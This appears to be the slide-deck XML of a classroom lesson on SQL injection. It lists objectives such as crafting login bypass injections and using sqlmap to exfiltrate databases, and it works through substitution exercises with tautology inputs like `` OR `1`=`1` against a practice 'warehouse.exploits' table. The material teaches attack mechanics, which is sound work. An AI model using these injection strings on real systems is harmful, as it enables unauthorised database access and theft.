              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This simply retrieves the record for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>eternal romance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>warehouse.exploits table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="979800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.exploits WHERE name='eternal romance';</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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9" name="Shape 1029"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Google Shape;1030;p5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Today’s Objectives</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p5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the end of class, you will be able to:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="Google Shape;1032;p5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33" name="Google Shape;1033;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identify potential SQL injection points.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manually craft and deliver login bypass injections. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use sqlmap to exfiltrate the contents of a vulnerable database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034" name="Google Shape;1034;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="1326248"/>
            <a:ext cx="230700" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd fmla="val 12500" name="adj"/>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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="1704023"/>
            <a:ext cx="230700" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd fmla="val 12500" name="adj"/>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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="2123811"/>
            <a:ext cx="230700" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd fmla="val 12500" name="adj"/>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7" name="Shape 1167"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="Google Shape;1170;p7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71" name="Google Shape;1171;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453325" y="1557750"/>
            <a:ext cx="8260800" cy="979800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.exploits WHERE name=`aurora` OR id=`1`;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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5" name="Shape 1175"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176" name="Google Shape;1176;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Google Shape;1177;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178" name="Google Shape;1178;p7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79" name="Google Shape;1179;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431225" y="1557750"/>
            <a:ext cx="8283000" cy="979800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.exploits WHERE name=`aurora` OR id=`1`;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490650" y="2836050"/>
            <a:ext cx="8223600" cy="197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highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME = `aurora` OR id=`1`</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1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4" name="Shape 1184"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1185" name="Google Shape;1185;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="Google Shape;1187;p7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88" name="Google Shape;1188;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="979800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.exploits WHERE name=`` OR `1`=`1`;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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2" name="Shape 1192"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1195" name="Google Shape;1195;p7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96" name="Google Shape;1196;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="979800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.exploits WHERE name=`` OR `1`=`1`;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
